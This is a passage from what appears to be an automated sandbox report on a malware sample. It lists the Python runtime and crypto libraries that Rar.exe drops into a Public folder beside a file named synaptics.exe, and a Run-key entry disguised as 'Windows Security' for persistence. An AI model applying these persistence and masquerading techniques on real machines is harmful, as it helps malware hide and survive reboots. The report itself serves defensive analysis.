Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6CA47861 push ds; iretd 14_2_6CA47865
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32service.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32event.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32console.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32evtlog.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\winxpgui.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32net.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\pythonwin\dde.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32wnet.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32ts.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\pythonwin\Pythonwin.exeJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_msi.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32crypt.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\odbc.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32file.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32profile.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\select.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32job.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\pythonservice.exeJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32inet.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_zoneinfo.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win32.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\winsound.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32gui.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32print.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32help.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32clipboard.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\synaptics.exeJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\pythonwin\mfc140u.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32comext\axcontrol\axcontrol.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\servicemanager.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32process.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32ras.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\libffi-7.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\python310.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32lz.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32comext\authorization\authorization.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\perfmon.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\charset_normalizer\md.cp310-win32.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32trace.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32pdh.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\_winxptheme.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\isapi\PyISAPI_loader.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32security.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32transaction.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\mmapfile.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32cred.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32comext\adsi\adsi.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_uuid.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\_elementtree.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\perfmondata.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\DLLs\sqlite3.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\timer.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeFile created: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32pipe.pydJump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows SecurityJump to behavior
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows SecurityJump to behavior
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows SecurityJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32service.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32event.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32console.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\winxpgui.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32evtlog.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32net.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\pythonwin\dde.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\pythonwin\Pythonwin.exeJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32wnet.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32ts.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_msi.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32crypt.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\odbc.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32file.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32profile.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\select.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32job.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\pythonservice.exeJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32inet.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_zoneinfo.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win32.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\winsound.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32print.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32gui.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32help.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32clipboard.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\pythonwin\mfc140u.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32comext\axcontrol\axcontrol.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\servicemanager.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32process.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32ras.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\libffi-7.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32lz.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32comext\authorization\authorization.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\perfmon.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\charset_normalizer\md.cp310-win32.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32pdh.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32trace.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\_winxptheme.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\isapi\PyISAPI_loader.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32security.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32transaction.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\mmapfile.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32cred.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32comext\adsi\adsi.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_uuid.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\_elementtree.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\perfmondata.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\DLLs\sqlite3.dllJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\timer.pydJump to dropped file
Source: C:\Users\user\Desktop\Rar.exeDropped PE file which has not been started: C:\Users\Public\M20EKMMEH2\Lib\site-packages\win32\win32pipe.pydJump to dropped file
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C9A2D20 FindFirstFileW,FindNextFileW,FindClose,14_2_6C9A2D20
